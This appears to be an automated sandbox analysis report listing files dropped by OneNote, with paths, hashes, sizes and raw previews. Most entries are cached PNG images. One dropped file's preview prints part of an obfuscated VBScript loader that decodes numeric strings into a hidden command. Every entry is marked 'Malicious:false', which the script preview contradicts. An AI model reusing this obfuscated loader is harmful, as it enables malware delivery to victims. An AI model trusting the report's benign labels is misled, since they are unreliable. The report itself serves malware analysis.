                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):55113
                                                                                                                                                                                                          Entropy (8bit):5.216959514455489
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                          MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                          SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                          SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                          SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):362512
                                                                                                                                                                                                          Entropy (8bit):7.486513932708276
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:pyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:/WZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                                                                                                                          MD5:F29F0C388DAAD4D7982D8C92F752B9F2
                                                                                                                                                                                                          SHA1:29FCFE714B39CB1A95754774FE36A32FC35EAFAE
                                                                                                                                                                                                          SHA-256:F2BBEDE411F5379C58828A197F3F3C75C9AB3D9850180393FC72C2BD915B2662
                                                                                                                                                                                                          SHA-512:C9B24029C9C899B58497DB9EBBFC56CF148B01440F7DB2E16E13AF0FEA17D118093C7ABB412E95FB04503836CC1CCE9BAF083D58DBA5B5C8F462967CDC0B8886
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.R\{..M..Sx.).....OK.A.p...b'r................?.....I.......*...*...*...*..........................................................N...C...S.d(.x...........(~......................8.......0..........................I.....?.w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5136
                                                                                                                                                                                                          Entropy (8bit):2.772191483570955
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:DnLW/uIPv4om1mAlthbXg1jveqac0bac3:3nrD8j1a9baq
                                                                                                                                                                                                          MD5:E308FDC79B4FD9F87811A620F420986F
                                                                                                                                                                                                          SHA1:BC7B2C1F609E08FED3D4125856DE5F761CD71F62
                                                                                                                                                                                                          SHA-256:4DB78E5821A0CC251613316ED59F395A518809B79B6B09030B1C40E2520F60ED
                                                                                                                                                                                                          SHA-512:B20A355BC41B3A9F549ABFFEB57814C306471C1CD2CF678DE8651BD56E57A038F85CF1E4360308491A6C0383C9AE3FCF7259BCEE5F48AD1C5009A0BD40AB991E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:./.C..vL....W"v_.......N...C...S................?.....I...........................................................................................................................................................v......N._.;.:.Z........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
